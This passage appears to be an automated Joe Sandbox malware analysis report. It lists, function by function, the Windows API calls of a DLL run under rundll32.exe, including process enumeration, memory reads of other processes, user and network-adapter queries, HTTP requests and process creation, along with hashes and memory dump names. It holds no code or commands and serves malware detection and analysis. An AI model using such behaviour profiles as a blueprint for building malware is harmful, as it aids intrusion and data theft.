APIs

Part of subcall function 00007FFB1E86AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1E86AD6A

FindFirstFileA.KERNEL32 ref: 00007FFB1E861AC7
wsprintfA.USER32 ref: 00007FFB1E861B95
FindNextFileA.KERNEL32 ref: 00007FFB1E861BC2
FindClose.KERNEL32 ref: 00007FFB1E861BD5

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
String ID:
API String ID: 65906682-0
Opcode ID: f0eb44e509ff0d4d73d58d8dbe5cd4570fa6573ad47b34b09cc61e315acd5dcb
Instruction ID: 5a745b009f0cd31512de3fa27f2c045e34e7d0627f03362659e460c76a5a6c26
Opcode Fuzzy Hash: f0eb44e509ff0d4d73d58d8dbe5cd4570fa6573ad47b34b09cc61e315acd5dcb
Instruction Fuzzy Hash: 0F5126B251DF8691DA50DB21F4403AAB3A6FF883A4F804535E68E43699EF7CF545CB40

Function 00007FFB1E868560 Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL ref: 00007FFB1E868595
GetVersionExW.KERNEL32 ref: 00007FFB1E8685AA

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 1c33a9e7f7864ab9b6d588ba9abe1a45e84af9b554b73114541b1a6212808f0c
Instruction ID: cdf11eb31306092d5032e4b81fb523418923fd2fbde684bc30c3cb1aa617b8c1
Opcode Fuzzy Hash: 1c33a9e7f7864ab9b6d588ba9abe1a45e84af9b554b73114541b1a6212808f0c
Instruction Fuzzy Hash: BB317EF1C2D941C6EAB08B50F54C33AF6A2FB98329F502139E29E45994DB7CF594CE05

Function 00007FFB1E864F58 Relevance: 1.6, APIs: 1, Instructions: 53filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET ref: 00007FFB1E864FB9

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: a68542daa31667be7df08955cda83d3b91bfe5c76f250ac66b7e363db0ead897
Instruction ID: 868bcfd6431aa0e6a10dbf8ffa41b15761f698d7fe955961a6c021458836b6c7
Opcode Fuzzy Hash: a68542daa31667be7df08955cda83d3b91bfe5c76f250ac66b7e363db0ead897
Instruction Fuzzy Hash: 54214D72628A8187DB61CB25E4507AAA3E2F7CC784F404134EA8D83B98EF3DD645CF00

Function 00007FFB1E867704 Relevance: 1.5, APIs: 1, Instructions: 22filenativeCOMMON

Download Yara Rule

APIs

NtQueryInformationFile.NTDLL ref: 00007FFB1E86774D

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: FileInformationQuery
String ID:
API String ID: 365787318-0
Opcode ID: 098af84858ac3b4f52afb1f03821544a4055eeb608dc3f3c06a72dec3df0af55
Instruction ID: 5bb32cb1f54c31fb3d617247aae5db1493eabace367975838b417855bdad8174
Opcode Fuzzy Hash: 098af84858ac3b4f52afb1f03821544a4055eeb608dc3f3c06a72dec3df0af55
Instruction Fuzzy Hash: 76F0A7B172CE8582E7409B21E40079EA751FBC47A0F404035E58D9BB58DFBDE5458B40

Function 00007FFB1E86C934 Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL ref: 00007FFB1E86C956

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 59eb6cab38d5ab3a285350ec58574edb8211473a9c8413bbadbb0b9e4aa9da1f
Instruction ID: 4e299292fe1eb3adde2c7a294031fa4c1f5fefa9d2fe113b6e41cf6d9ada8b51
Opcode Fuzzy Hash: 59eb6cab38d5ab3a285350ec58574edb8211473a9c8413bbadbb0b9e4aa9da1f
Instruction Fuzzy Hash: DCD0C776A1868187CB145B24E45501A7760FB95304FD04529E68D55754DE3CD625CF04

Function 00007FFB1E861C38 Relevance: 15.2, APIs: 10, Instructions: 234processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FFB1E861C72

Part of subcall function 00007FFB1E86AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1E86AD6A

Process32First.KERNEL32 ref: 00007FFB1E861CFC
Process32Next.KERNEL32 ref: 00007FFB1E861D1D
Process32First.KERNEL32 ref: 00007FFB1E861D49
Process32Next.KERNEL32 ref: 00007FFB1E861D96
Process32First.KERNEL32 ref: 00007FFB1E861DAD
wsprintfA.USER32 ref: 00007FFB1E861EF0
wsprintfA.USER32 ref: 00007FFB1E861F96
Process32Next.KERNEL32 ref: 00007FFB1E8620D3
CloseHandle.KERNEL32 ref: 00007FFB1E8620F0

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
String ID:
API String ID: 3605396869-0
Opcode ID: df5dea298db85244bf739151dd0f199090a4904090481203f9a3e6dbb1e14d00
Instruction ID: 52369fcefba164068206134278dfc38db0407164cd20ff08e77a7ab4b118a07e
Opcode Fuzzy Hash: df5dea298db85244bf739151dd0f199090a4904090481203f9a3e6dbb1e14d00
Instruction Fuzzy Hash: 18D101B260CF8695DA70DB25E4503AAB7A6FB88394F804135D6CD43BA9EF3CE545CB40

Function 00007FFB1E864110 Relevance: 12.2, APIs: 8, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB1E86AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1E86AD6A

Part of subcall function 00007FFB1E867E90: SHGetFolderPathW.SHELL32 ref: 00007FFB1E867EC3

wsprintfW.USER32 ref: 00007FFB1E86424D
wsprintfW.USER32 ref: 00007FFB1E8642A8
wsprintfW.USER32 ref: 00007FFB1E8643C3

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf$AllocateFolderMemoryPathVirtual
String ID:
API String ID: 206084008-0
Opcode ID: 613f21d74cee651ec8cd53ec4a79d78952a861f9d187309613a0fa89924084a3
Instruction ID: eb08a43d9f32bd6ba0dbcd7e5a29d8a475c1f581239728949247254f304b4680
Opcode Fuzzy Hash: 613f21d74cee651ec8cd53ec4a79d78952a861f9d187309613a0fa89924084a3
Instruction Fuzzy Hash: 51D1DAA261DFC291EA60DB24E4507AFB362FBC8354F501036E68D87AA9DF7CE545CB40

Function 00007FFB1E865750 Relevance: 11.0, APIs: 7, Instructions: 467threadCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00007FFB1E865BB7
wsprintfA.USER32 ref: 00007FFB1E865CA6
wsprintfA.USER32 ref: 00007FFB1E865DCD
new[].LIBCPMTD ref: 00007FFB1E865E75

Part of subcall function 00007FFB1E864D20: InternetCloseHandle.WININET ref: 00007FFB1E864F33
Part of subcall function 00007FFB1E864D20: InternetCloseHandle.WININET ref: 00007FFB1E864F46

new[].LIBCPMTD ref: 00007FFB1E865FA3
GetExitCodeThread.KERNEL32 ref: 00007FFB1E8661C3
GetExitCodeThread.KERNEL32 ref: 00007FFB1E8661FC

Part of subcall function 00007FFB1E86AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1E86AD6A

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf$CloseCodeExitHandleInternetThreadnew[]$AllocateMemoryVirtual
String ID:
API String ID: 511820185-0
Opcode ID: b11fec9b2df619dd1629fbab8ca8a0df756b4cb1f15924333ec51bd5337baf54
Instruction ID: 3c8c7279e6aad33fff4c8744ad7e9ff9def80d3771b1d9ee395a17bb59a01a85
Opcode Fuzzy Hash: b11fec9b2df619dd1629fbab8ca8a0df756b4cb1f15924333ec51bd5337baf54
Instruction Fuzzy Hash: 7F520AB591DEC286E770CB24E4443AAB7A2FB88364F104535D68D96BA9DF7CF485CB00

Function 00007FFB1E86B670 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 00007FFB1E86B6DE
MapViewOfFile.KERNEL32 ref: 00007FFB1E86B711
VirtualFree.KERNEL32 ref: 00007FFB1E86B815
UnmapViewOfFile.KERNEL32 ref: 00007FFB1E86B82D
CloseHandle.KERNEL32 ref: 00007FFB1E86B838

Strings

@, xrefs: 00007FFB1E86B6F8

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
String ID: @
API String ID: 1610889594-2766056989
Opcode ID: 4573a02829f282772507428644cc67174c61ceec7a673b26d8b8ac1498a62bea
Instruction ID: c6cffbbe94a0d4f330e1026f67ee874c9b9e17ad29d457293754bf2fe4629d70
Opcode Fuzzy Hash: 4573a02829f282772507428644cc67174c61ceec7a673b26d8b8ac1498a62bea
Instruction Fuzzy Hash: 26513476A19F8681EB50DB25E45036EB762FBC87A4F500131EA8E43BA9DF3CE445C700

Function 00007FFB1E8614D8 Relevance: 7.7, APIs: 5, Instructions: 176processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FFB1E8614FA
Process32First.KERNEL32 ref: 00007FFB1E861548
wsprintfA.USER32 ref: 00007FFB1E861693
wsprintfA.USER32 ref: 00007FFB1E86172D
Process32Next.KERNEL32 ref: 00007FFB1E86184F

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 4137211488-0
Opcode ID: 589aefb776d13d9939ed19f12e913b119a33694cf421f9d1ae57f596f02ad99c
Instruction ID: 163399ac267d2b884ba732c8be4aef4fab10b020b04d19feec6c64096ddb1c79
Opcode Fuzzy Hash: 589aefb776d13d9939ed19f12e913b119a33694cf421f9d1ae57f596f02ad99c
Instruction Fuzzy Hash: 3791F476A1DFC2D6DA60DB25E4402AAB3A6FB88394F500135DA8D43BA9DF3CE545CF40

Function 00007FFB1E865030 Relevance: 7.6, APIs: 5, Instructions: 122networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET ref: 00007FFB1E865168
HttpOpenRequestA.WININET ref: 00007FFB1E8651E8
InternetSetOptionA.WININET ref: 00007FFB1E865227
HttpSendRequestA.WININET ref: 00007FFB1E865273
HttpSendRequestA.WININET ref: 00007FFB1E865294

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpRequest$OpenSend$InternetOption
String ID:
API String ID: 664753792-0
Opcode ID: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
Instruction ID: f18b43761ff488d8caef14c0b0993910f523f9c1e93f7f82d61e3d26fc0940f4
Opcode Fuzzy Hash: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
Instruction Fuzzy Hash: C961B6B690DF8186E760CB24F4543AAB7A2F789794F500435E68D43B68DF7DE588CB40

Function 00007FFB1E868D90 Relevance: 7.6, APIs: 5, Instructions: 92networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00007FFB1E868DF7
InternetOpenUrlW.WININET ref: 00007FFB1E868E33
InternetCloseHandle.WININET ref: 00007FFB1E868F33
InternetCloseHandle.WININET ref: 00007FFB1E868F46

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen
String ID:
API String ID: 435140893-0
Opcode ID: 403d023b98cd0d8e1c326f4d095468dd49f40ac6afd71fa5eece1c87c1cd0193
Instruction ID: 1f88cfa5363c87a3835af63c29a4277f2b8f03a8f89f96380992241a40e59e68
Opcode Fuzzy Hash: 403d023b98cd0d8e1c326f4d095468dd49f40ac6afd71fa5eece1c87c1cd0193
Instruction Fuzzy Hash: 3D41D8B6A29E8186E760CB25F45472EB3A2F7C9794F105025F78E83B58CF7DE8448B04

Function 00007FFB1E86B4CC Relevance: 7.6, APIs: 5, Instructions: 79processCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00007FFB1E86B59C
wsprintfW.USER32 ref: 00007FFB1E86B5EE
CreateProcessW.KERNEL32 ref: 00007FFB1E86B63D
CloseHandle.KERNEL32 ref: 00007FFB1E86B650
CloseHandle.KERNEL32 ref: 00007FFB1E86B65B

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$CreateProcess
String ID:
API String ID: 2803068115-0
Opcode ID: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
Instruction ID: ec4c0edb961ab50d9e48040222ac13179c7c2eda0af0f08378e81dca6f1d11b9
Opcode Fuzzy Hash: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
Instruction Fuzzy Hash: 744100B2A0CFC295E760DB20E4503AAB762FBC8354F404035D68E43A69EF7CE559CB40

Analysis Process: rundll32.exePID: 7620, Parent PID: 7540COMMON

Execution Graph

Execution Coverage:	30.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1025
Total number of Limit Nodes:	11

Executed Functions

Function 00007FFB1C817FA8 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFB1C81AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1C81AD6A

GetAdaptersInfo.IPHLPAPI ref: 00007FFB1C817FF4
GetAdaptersInfo.IPHLPAPI ref: 00007FFB1C81802B
wsprintfA.USER32 ref: 00007FFB1C818074
wsprintfA.USER32 ref: 00007FFB1C81815F
wsprintfA.USER32 ref: 00007FFB1C8181C3

Strings

o, xrefs: 00007FFB1C818006

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
String ID: o
API String ID: 2074107575-252678980
Opcode ID: 5678bc6a62718c3e63ead93259fe08f5e85b7c10f4d34a2ffbc93c20a916c06a
Instruction ID: 6579f2d307b091c627116e7378dc41451bb40cad13793c6e5edb9010fe13ac2f
Opcode Fuzzy Hash: 5678bc6a62718c3e63ead93259fe08f5e85b7c10f4d34a2ffbc93c20a916c06a
Instruction Fuzzy Hash: DAB1FEB661DE81CADA60CB24E4993BAB7E2FB88754F601135E68E43B59DF3CD544CB00

Function 00007FFB1C81463C Relevance: 15.3, APIs: 10, Instructions: 291
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFB1C814666
GetCurrentProcessId.KERNEL32 ref: 00007FFB1C814673

Part of subcall function 00007FFB1C818AE0: GetUserNameA.ADVAPI32 ref: 00007FFB1C818B08
Part of subcall function 00007FFB1C818AE0: wsprintfA.USER32 ref: 00007FFB1C818B25

GetCurrentProcessId.KERNEL32 ref: 00007FFB1C814743
GetCurrentProcessId.KERNEL32 ref: 00007FFB1C81478D
OpenProcess.KERNEL32 ref: 00007FFB1C81479D
NtQueryInformationProcess.NTDLL ref: 00007FFB1C814800
ReadProcessMemory.KERNEL32 ref: 00007FFB1C814873
ReadProcessMemory.KERNEL32 ref: 00007FFB1C8148CD

Part of subcall function 00007FFB1C81AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1C81AD6A

WideCharToMultiByte.KERNEL32 ref: 00007FFB1C814946
FindCloseChangeNotification.KERNEL32 ref: 00007FFB1C814B2C

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: Process$CurrentMemory$Read$AllocateByteChangeCharCloseFindHandleInformationModuleMultiNameNotificationOpenQueryUserVirtualWidewsprintf
String ID:
API String ID: 2225485709-0
Opcode ID: 87250553c3aa292502944f3e15e1c9efea1f990ae94d0822f0496687024c8696
Instruction ID: 771b739b5c3bd74e5e7cb9c014b8c802422b45f3aea7ac4c6541bea50cce47e9
Opcode Fuzzy Hash: 87250553c3aa292502944f3e15e1c9efea1f990ae94d0822f0496687024c8696
Instruction Fuzzy Hash: 01F1F9F1909E86C9E760DB24E4983FAA3E2FB84764F605135E68D83A95DF3CE545CB00

Function 00007FFB1C8177B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitUnicodeString.NTDLL ref: 00007FFB1C81781B
NtCreateFile.NTDLL ref: 00007FFB1C817898

Strings

@, xrefs: 00007FFB1C81782E
0, xrefs: 00007FFB1C817803

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFileInitStringUnicode
String ID: 0$@
API String ID: 2498367268-1545510068
Opcode ID: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
Instruction ID: c2cd6f28388bd1e75ae4abc340420f32ddb92a586a96a95c8955d3654937636c
Opcode Fuzzy Hash: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
Instruction Fuzzy Hash: A921E3B2508B808AE760CF14F49839BB7A1F3C0364F908229E2D947AA8CF7DD549CF40

Function 00007FFB1C8168E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetAdaptersInfo.IPHLPAPI ref: 00007FFB1C816910

Part of subcall function 00007FFB1C81AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1C81AD6A

GetAdaptersInfo.IPHLPAPI ref: 00007FFB1C81693B

Strings

o, xrefs: 00007FFB1C81691A

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

